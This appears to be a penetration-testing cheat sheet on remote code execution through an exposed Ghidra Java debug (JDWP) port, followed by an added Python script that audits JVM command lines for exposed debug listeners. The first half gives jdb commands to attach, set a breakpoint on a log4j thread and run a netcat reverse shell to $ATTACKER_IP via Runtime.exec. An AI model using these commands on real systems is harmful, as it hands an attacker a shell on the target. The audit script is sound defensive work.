# Ghidra Debug RCE
* If debug mode is enabled, connect to it via `jdb`
```sh
jdb -attach $TARGET_IP:$TARGET_PORT
```
* List the classpath and the loaded classes
```sh
classpath
classes
```
* Set a breakpoint to suspend a service thread
```sh
stop in org.apache.logging.log4j.core.util.WatchManager$WatchRunnable.run()
```
* Wait until the breakpoint hits and start a reverse shell
```sh
print new java.lang.Runtime().exec("nc.traditional $ATTACKER_IP 4449 -e /bin/sh")
```
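
A defensive check for the precondition in the first step, as an added example that is not part of the original cheat sheet: it classifies the JDWP agent options on a JVM command line by how the debug listener is bound. The sample command lines, port numbers and function names are constructed for illustration.

```python
import re
import shlex

# Both spellings of the JDWP agent flag: -agentlib:jdwp=... and legacy -Xrunjdwp:...
_JDWP_FLAG = re.compile(r"^-(?:agentlib:jdwp=|Xrunjdwp:)(.*)$")
_LOOPBACK = {"localhost", "127.0.0.1", "::1", "[::1]"}

def jdwp_exposure(cmdline):
    """Classify the JDWP exposure of one JVM command line.

    Returns None when no JDWP agent is configured, otherwise
    (verdict, address) with verdict one of:
      'exposed'     listener bound to a wildcard or non-loopback host
      'jdk-default' no host in address: all interfaces on JDK 8 and
                    older, loopback only on JDK 9 and newer
      'loopback'    listener bound to loopback only
      'outbound'    server=n, the JVM dials out instead of listening
    """
    for arg in shlex.split(cmdline):
        m = _JDWP_FLAG.match(arg)
        if not m:
            continue
        opts = dict(kv.split("=", 1) for kv in m.group(1).split(",") if "=" in kv)
        addr = opts.get("address", "")
        if opts.get("server", "n") != "y":   # JDWP default is server=n
            return ("outbound", addr)
        host = addr.rpartition(":")[0]       # '' when only a port is given
        if not host:
            return ("jdk-default", addr)
        if host.lower() in _LOOPBACK:
            return ("loopback", addr)
        return ("exposed", addr)
    return None

# Constructed sample input, e.g. what `ps -eo args` could show on a host.
SAMPLE = [
    "java -Xmx1G -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:18001 -cp app.jar Main",
    "java -Xdebug -Xrunjdwp:transport=dt_socket,server=y,address=8000 -jar svc.jar",
    "java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=127.0.0.1:5005 -jar svc.jar",
    "java -jar plain.jar",
]

def audit(lines):
    """Return (verdict, address, cmdline) for every line that is not safely bound."""
    hits = [(jdwp_exposure(l), l) for l in lines]
    return [(r[0], r[1], l) for r, l in hits if r and r[0] in ("exposed", "jdk-default")]

if __name__ == "__main__":
    for verdict, addr, line in audit(SAMPLE):
        print(f"{verdict:12} {addr:16} {line}")
```

Anything reported as `exposed` or `jdk-default` should have the agent removed or be rebound to loopback and firewalled, since a reachable JDWP port gives a debugger the code execution shown above.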